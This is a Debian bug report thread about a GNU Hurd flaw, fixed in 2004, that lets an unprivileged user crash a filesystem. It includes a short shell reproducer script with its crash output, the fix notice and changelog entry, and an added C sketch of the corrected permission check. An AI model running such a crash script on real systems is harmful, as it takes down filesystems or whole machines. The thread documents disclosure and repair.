
Bug#190732: marked as done (hurd: non-priviledged user may crash filesys


From: Debian Bug Tracking System
Subject: Bug#190732: marked as done (hurd: non-priviledged user may crash filesystem)
Date: Mon, 01 Mar 2004 11:03:09 -0800

Your message dated Mon, 1 Mar 2004 19:18:16 +0100
with message-id <20040301181816.GA16922@blackbird.oase.mhn.de>
and subject line hurd: non-priviledged user may crash filesystem
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 25 Apr 2003 12:05:35 +0000
From: Robert Millan <rmh@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: hurd: non-priviledged user may crash filesystem
X-Mailer: reportbug 2.10.1
Date: Fri, 25 Apr 2003 14:04:47 +0200
Message-Id: <E1991wd-0002Nf-00@aragorn>

Package: hurd
Version: 20021118-2
Severity: critical

By exploiting this bug, a non-privileged user is able to crash
a filesystem to which he/she has read/write access. If that
filesystem is /, then he/she is able to crash the whole system.

test log:

$ dd if=/dev/zero of=./fs ibs=32k count=10 ; mke2fs -o hurd ./fs
[...]
$ settrans -cafg ./mnt /hurd/ext2fs ./fs
$ cat cbtf
#!/bin/sh -x
# crashes the filesystem on which it is being run.
# (caution: if that filesystem is /, crashes the system)
rm -rf no-write dir
mkdir -p no-write/dir
chmod 555 no-write
mv no-write/dir .
$ ./cbtf
+ rm -rf no-write dir
+ mkdir -p no-write/dir
+ chmod 555 no-write
+ mv no-write/dir .
ext2fs: ../../libdiskfs/dir_renamed.c: 202: diskfs_rename_dir: Assertion `tmpnp = fnp' failed.
mv: cannot move `no_write/dir' to `./dir': Computer bought the farm

-- System Information:
Debian Release: testing/unstable
Architecture: hurd-i386
Kernel: GNU aragorn 0.3 GNUmach-1.2/Hurd-0.3 i386-AT386
Locale: LANG=C, LC_CTYPE=C

Versions of packages hurd depends on:
ii  libc0.3                  2.3.1-5         GNU C Library: Shared libraries an
ii  libncursesw5             5.2.20020112a-8 Shared libraries for terminal hand

-- no debconf information


---------------------------------------
Received: (at 190732-done) by bugs.debian.org; 1 Mar 2004 18:48:16 +0000
Date: Mon, 1 Mar 2004 19:18:16 +0100
From: Michael Banck <mbanck@debian.org>
To: 190732-done@bugs.debian.org
Subject: Re: hurd: non-priviledged user may crash filesystem
Message-ID: <20040301181816.GA16922@blackbird.oase.mhn.de>

This bug has been fixed by the recent upload of hurd_20040301-1. One
patch has been applied to fix this bug:

2003-06-11  Ognyan Kulev  <ogi@fmi.uni-sofia.bg>

        * dir-renamed.c (diskfs_rename_dir): Check permissions to remove
        FROMNAME before any modification could take place.  Check result
        of removing the from node.

The still not applied patch for libdiskfs contained in the bug log is
also available at
http://savannah.gnu.org/patch/?func=detailitem&item_id=1839


Thanks,

Michael
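
The ordering named in the changelog entry above (check permission to remove FROMNAME before any modification, then check the result of removing the from node), sketched as an added example on a toy in-memory model. This is not the libdiskfs patch or code from this thread; `toy_dir`, `toy_rename_dir` and the helpers are hypothetical names, and the rollback after a failed removal is an assumption of the sketch.

```c
#include <errno.h>
#include <stdbool.h>
#include <string.h>

/* Toy model constructed for this example (not libdiskfs): one entry per dir. */
struct toy_dir { bool writable; bool io_fault; char entry[32]; };

static int toy_may_remove(const struct toy_dir *d, const char *name)
{
    if (strcmp(d->entry, name) != 0) return ENOENT;
    return d->writable ? 0 : EACCES;      /* pure check, modifies nothing */
}

static int toy_remove(struct toy_dir *d, const char *name)
{
    int err = toy_may_remove(d, name);
    if (!err && d->io_fault) err = EIO;   /* simulated late failure */
    if (!err) d->entry[0] = '\0';
    return err;
}

static int toy_add(struct toy_dir *d, const char *name)
{
    if (!d->writable) return EACCES;
    if (d->entry[0] != '\0') return EEXIST;
    if (strlen(name) >= sizeof d->entry) return ENAMETOOLONG;
    strcpy(d->entry, name);
    return 0;
}

/* Check permission to remove FROMNAME before modifying anything, and return
   a failed removal to the caller (undoing the add) instead of asserting. */
int toy_rename_dir(struct toy_dir *from, const char *fromname,
                   struct toy_dir *to, const char *toname)
{
    int err = toy_may_remove(from, fromname);
    if (err) return err;                /* nothing has been modified yet */
    err = toy_add(to, toname);
    if (err) return err;
    err = toy_remove(from, fromname);   /* result checked, not asserted */
    if (err) toy_remove(to, toname);    /* roll back so TO is unchanged */
    return err;
}

int main(void)
{
    struct toy_dir no_write = { false, false, "dir" }, cwd = { true, false, "" };
    return toy_rename_dir(&no_write, "dir", &cwd, "dir") == EACCES ? 0 : 1;
}
```

With the source directory read-only, as in the `chmod 555 no-write` step of the test log, the call returns `EACCES` and neither directory is touched.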



